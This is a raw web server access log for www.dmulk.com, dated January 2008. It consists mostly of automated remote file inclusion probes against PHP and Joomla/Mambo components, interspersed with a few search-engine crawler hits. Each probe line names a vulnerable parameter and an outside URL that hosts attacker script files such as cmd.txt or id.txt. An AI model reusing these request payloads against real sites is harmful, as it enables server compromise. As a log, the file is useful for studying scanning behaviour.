202.124.242.154 - - [30/Jan/2008:13:03:33 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:03:33 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:03:33 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:03:44 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:04:20 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:04:51 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:13:05:13 -0800] "GET /logs/access_071230.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:05:30 -0800] "GET /logs/access_071214.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.22.162.60 - - [30/Jan/2008:13:05:41 -0800] "GET /logs/access_071224.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:05:42 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:06:23 -0800] "GET /logs/access_071230.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [30/Jan/2008:13:07:03 -0800] "GET /logs/access_071224.log//classes/adodbt/sql.php?classes_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:07:55 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:07:55 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:07:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:07:57 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.92.145.181 - - [30/Jan/2008:13:09:08 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.92.145.181 - - [30/Jan/2008:13:09:08 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:10:31 -0800] "GET /logs/access_071230.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:11:35 -0800] "GET /logs/access_071231.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:11:36 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [30/Jan/2008:13:11:36 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:13:11:56 -0800] "GET /logs/access_071224.log//classes/adodbt/sql.php?classes_dir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:11:58 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:11:58 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:13:12:56 -0800] "GET //appserv/main.php?appserv_root=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.34.10 - - [30/Jan/2008:13:12:57 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.38.34.10 - - [30/Jan/2008:13:12:57 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:14:02 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.6.59.91 - - [30/Jan/2008:13:14:12 -0800] "GET /index.php?pagina1=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:13:15:24 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.45.176.234 - - [30/Jan/2008:13:15:24 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.174.96.200 - - [30/Jan/2008:13:15:35 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.studio-dom.yoyo.pl/cd/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.174.96.200 - - [30/Jan/2008:13:15:36 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.studio-dom.yoyo.pl/cd/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.174.96.200 - - [30/Jan/2008:13:15:36 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.studio-dom.yoyo.pl/cd/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [30/Jan/2008:13:16:08 -0800] "GET /index.php?fn=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [30/Jan/2008:13:17:10 -0800] "GET /logs/access_071218.log/index.php?fn=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [30/Jan/2008:13:17:10 -0800] "GET /index.php?fn=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [30/Jan/2008:13:17:11 -0800] "GET /logs/index.php?fn=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:13:18:03 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:19:18 -0800] "GET /logs/access_071219.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:13:22:36 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:13:22:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.148.126.98 - - [30/Jan/2008:13:22:55 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://guido93hack.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:23:07 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:23:07 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:13:25:31 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:13:25:36 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.45.242.50 - - [30/Jan/2008:13:25:39 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:25:45 -0800] "GET /logs/access_071222.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:26:07 -0800] "GET /logs/access_071216.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:26:39 -0800] "GET /logs/access_071220.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:13:28:11 -0800] "GET /order/login.php?svr_rootscript=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
210.14.110.31 - - [30/Jan/2008:13:28:12 -0800] "GET /logs/order/login.php?svr_rootscript=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:28:50 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:28:51 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:28:59 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:28:59 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:29:06 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://handaeng.com/dave/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:29:13 -0800] "GET /logs/access_071214.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:29:14 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.21 - - [30/Jan/2008:13:29:17 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.48.226.73 - - [30/Jan/2008:13:31:22 -0800] "GET /logs/access.log/classes/adodbt/sql.php?classes_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:13:34:51 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:06 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:07 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:07 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:07 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:07 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [30/Jan/2008:13:37:07 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fartlek.it/images/image/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.139 - - [30/Jan/2008:13:37:29 -0800] "GET /minamijewelry/?D=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:13:38:20 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:13:38:20 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:13:38:20 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:13:39:01 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:13:39:01 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.38.155 - - [30/Jan/2008:13:39:24 -0800] "GET /logs/access.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://klinik.freehostia.com/senjata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.38.155 - - [30/Jan/2008:13:39:25 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://klinik.freehostia.com/senjata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.38.155 - - [30/Jan/2008:13:39:26 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://klinik.freehostia.com/senjata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:13:40:42 -0800] "GET //mosConfig_absolute_path=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:13:40:42 -0800] "GET /logs//mosConfig_absolute_path=http://66.93.90.101:32000/mail/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:13:44:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [30/Jan/2008:13:44:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
195.225.199.128 - - [30/Jan/2008:13:49:18 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [30/Jan/2008:13:49:18 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [30/Jan/2008:13:49:19 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.38.155 - - [30/Jan/2008:13:50:08 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://klinik.freehostia.com/senjata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.37 - - [30/Jan/2008:13:51:20 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:13:54:29 -0800] "GET //?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 2962 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:13:54:29 -0800] "GET /logs//?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 200 32403 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:54:34 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:54:35 -0800] "GET //components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:54:49 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.124.242.154 - - [30/Jan/2008:13:54:50 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.146 - - [30/Jan/2008:13:55:05 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.7.120 - - [30/Jan/2008:13:56:10 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.232 - - [30/Jan/2008:13:57:06 -0800] "GET /logs/access_071213.log HTTP/1.0" 200 79346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:13:57:35 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:13:57:35 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:13:57:36 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [30/Jan/2008:13:59:30 -0800] "GET //dir/to/claroline/user/exercises_details.php?http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [30/Jan/2008:14:00:42 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.19 - - [30/Jan/2008:14:00:43 -0800] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.1" 200 711 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
193.205.186.244 - - [30/Jan/2008:14:02:25 -0800] "GET /logs//portail/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:14:02:26 -0800] "GET //portail/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.22.125.219 - - [30/Jan/2008:14:02:53 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [30/Jan/2008:14:02:54 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
